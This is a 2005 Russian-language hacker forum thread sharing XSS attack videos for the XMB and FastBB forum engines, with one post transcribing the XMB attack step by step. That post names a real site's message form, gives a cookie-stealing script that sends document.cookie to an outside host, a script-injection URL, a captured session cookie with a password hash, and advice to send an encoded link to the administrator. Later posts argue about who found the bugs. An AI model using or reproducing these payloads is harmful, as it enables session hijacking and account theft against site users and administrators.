XSS в форумах XMB и FastBB |

16.11.2005, 18:03
|
|
Познавший АНТИЧАТ
Регистрация: 27.05.2002
Сообщений: 1,241
С нами:
12607586
Репутация:
0
|
|
XSS в форумах XMB и FastBB
XSS в форумах XMB.
Дата добавления: 15:54 16.11.2005
Автор: XgluiR[[NO]]
Категория: Другое
Скачать: xmbxss.rar [0.99 Мб]
XSS в форумах FastBB.
Дата добавления: 15:51 16.11.2005
Автор: Ван[[NO]]
Категория: Другое
Скачать: fastbbxss.rar [0.56 Мб]
|
|
|

17.11.2005, 06:13
|
|
Познавший АНТИЧАТ
Регистрация: 24.07.2005
Сообщений: 1,057
С нами:
10946149
Репутация:
116
|
|
Выдрано из архива с видео
Привет я XgLuir
Сейчас я покажу XSS в форумах XMB
идем на форум а потом в отправку личных сообщений
http://www.karakelle.ru/forum/u2u.php?action=send - тут форма для отпраки!
Дыра находиться в форме для получателей из-за плохой фильтрации
Как видите пашет внедрим снифир
Для этого создадим js файл с кодом для сниффера
img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;
он у меня уже есть
http://www.fath.jino-net.ru/hack.js
Внедрим
REFERER=http://www.karakelle.ru/forum/u2u.php?action=send&username=<script>alert('xss')</script><script%20src=http://www.fath.jino-net.ru/hack.js></script>
QUERY=xmblva=1131740719; xmbuser=Зайка; xmbpw=202cb962ac59075b964b07152d234b70; xmblvb=1131737548
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
Ну вот получили
xmbpw=202cb962ac59075b964b07152d234b70 - md5 hash
Но наверно появился вапрос а как у админы стырить ?
Отправляем админу сформированый линк он открывает и снифф записывает кукисы
http://www.karakelle.ru/forum/u2u.php?action=send&username=<script%20src=http://www.fath.jino-net.ru/hack.js></script>
Но лучше ссылку за кодировать
Вот и все
|
|
|

17.11.2005, 11:23
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
С нами:
10937126
Репутация:
1316
|
|
мда, извращение записывать видео, когда это мона описать в жва предложения.
Otaku спасибо.
|
|
|

19.11.2005, 14:46
|
|
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
С нами:
10915586
Репутация:
54
|
|
На fastbb багу уже прикрыли.
|
|
|

19.11.2005, 15:59
|
|
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
С нами:
11212166
Репутация:
182
|
|
На fastbb багу уже прикрыли.
Баг сам нашел?? вроде wj че-та находил да?
|
|
|

19.11.2005, 16:35
|
|
[ радиоверсия ]
Регистрация: 12.07.2005
Сообщений: 946
С нами:
10963106
Репутация:
1060
|
|
Сообщение от qBiN
Баг сам нашел?? вроде wj че-та находил да?
Задолго до wj енти и другие баги нашёл Zadohlik. Просто человек скромный и не страдает манией величия. А ентот wj взял и всё обосрал - даже упаковать не смог красиво.
__________________
ICQ 9731923
|
|
|

19.11.2005, 23:33
|
|
Banned
Регистрация: 19.11.2005
Сообщений: 17
С нами:
10775846
Репутация:
1
|
|
Сообщение от PSalm69
Задолго до wj енти и другие баги нашёл Zadohlik. Просто человек скромный и не страдает манией величия. А ентот wj взял и всё обосрал - даже упаковать не смог красиво.
Интересно, как понять эти и другие баги нашёл Задохлик? Что, все баги которые Я нашёл, Задохлик нашёл первый? или тебя понимать, что чтобы Я не находил, Задохлик уже это нашёл? Если да, то что? Это раз, два, Задохлик не показывает мне свою работу, по этому надежды что то скопировать у меня у него - нету как таковой.
Теперь, люди на форуме просили взломать фастбб потому что никто его не мог взломать. Если Задохлик, а кажись первым был не Задохлик а Джаз, ну так вот, если Джаз не захотел выложить коды для фастбб, или тот который нашёл, то это уже их проблемы. Я их выложил чисто чтобы похвастатся что Я Гений.
А вообще, Задохлик мало что понимает в ХSS, найти багу, с трудом может. Единственные люди на античате которые шарют в ХSS, так это White Jordan, Algol, zheleza, и zFailure которого терь нет. Задохлика эрия, это PHP including, так что не верю, что он мог в фастбб найти спаренные теги.
|
|
|

20.11.2005, 13:30
|
|
Постоянный
Регистрация: 28.02.2005
Сообщений: 853
С нами:
11156006
Репутация:
749
|
|
White Jordna, быстро твое мнение о людях меняется =D Ну ладно, думай как знаешь, я не буду писать что умеешь и не умеешь ты, т.к. каждому, кто в теме это и так уже понятно. И вообще меряться письками с кем-либо я не умею и не хочу.
|
|
|

20.11.2005, 21:42
|
|
Banned
Регистрация: 19.11.2005
Сообщений: 17
С нами:
10775846
Репутация:
1
|
|
Сообщение от Zadoxlik
White Jordna, быстро твое мнение о людях меняется =D Ну ладно, думай как знаешь, я не буду писать что умеешь и не умеешь ты, т.к. каждому, кто в теме это и так уже понятно. И вообще меряться письками с кем-либо я не умею и не хочу.
У меня поменялось мнение о твоей знатности XSS, когда Я прочёл твои старые посты
А так, Я знаю по твоему видео, что ты шаришь по php including да и всё...
Насчёт меня. Я просмотрел ВСЕ видео античата, и когда выходит новое видео, Я его опять смотрю. И к чему Я это? Да к тому, что Я умею всё.  Просто лучше всегдо, делаю атаки ХSS, так как это мне только и интересно. Баги php/including, SQL injection и т.д. они или есть, или их нет. Некоторые люди, могут их заставлять быть....как Я в XSS это прикраснно делаю. Баги XSS может и не быть, но Я заставлю чтобы она была и не важно на каком форуме или мыле! Вот такого уровня в других фазах не спорю, Я ещё не достиг. Но если бага уже найденна, или её легко найти, то провести атаку мне ничего не стоит....
Да Я и проводил и php including и SQL injection и многие другие разновидности атак, просто нашёл что к XSS у меня больше чем к другим, есть интерес. А вот такого уровня где человек заставляет XSS существовать когда её в памини нету и быть не может, вот такого уровня у тебя ещё нет.
Ты можешь найти что то basic как и все, а более advanced, это уже не к тебе идти. 
Последний раз редактировалось Бафун; 21.11.2005 в 00:25..
|
|
|

19.11.2005, 20:08
|
|
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
С нами:
10915586
Репутация:
54
|
|
Да, я взял багу которую выложил на форум wj, но она не работала-куки не подставлялись я просто капельку додумал-присылать переменные, во всем мне многие помогали, всем респект. Видео я сначала снимать и не думал, но потом подкинули идею-решил снять.
Насчёт сейчашней ситуации на fastbb-сейчас там что-то меняют, тег img не работает вообще. Обещают(посмотрел на a.fastbb.ru) что скоро закончат.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|